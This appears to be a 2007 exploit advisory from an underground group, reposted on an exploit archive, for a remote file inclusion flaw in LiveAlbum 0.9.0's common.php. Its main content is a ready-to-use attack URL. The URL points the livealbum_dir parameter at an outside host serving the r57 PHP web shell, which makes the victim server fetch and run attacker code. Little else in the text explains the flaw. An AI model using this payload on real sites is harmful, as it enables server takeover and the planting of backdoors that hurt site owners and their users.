id: 2207
date: 10/07/2007
title: LiveAlbum 0.9.0 common.php Remote File Inclusion Vulnerability
author: S.W.A.T.
cves: 

==============================================================
LiveAlbum 0.9.0 common.php Remote File Inclusion Vulnerability
==============================================================



                      \\\|///
                    \\  - -  //      Xmors Underground Group
                     (  @ @ )
              ----oOOo--(_)-oOOo--------------------------------------------------
              Portal   :  LiveAlbum 0.9.0
              Download :  http://downloads.sourceforge.net/livealbum/livealbum-0.9.1.tar.bz2
	      Author   :  S.W.A.T.
	      HomePage :  wWw.XmorS.CoM
	      Type     :  Remote File Inclusion
              ----ooooO-----Ooooo--------------------------------------------------
                  (   )     (   )
                   \ (       ) /
                    \_)     (_/



+---------------------------------------------------------------------------------------------+

Vuln :

http://[TARGET]/[PATH]/common.php?livealbum_dir=http://xmors.by.ry/r57.php?


+---------------------------------------------------------------------------------------------+



#  0day.today [2023-03-26]  #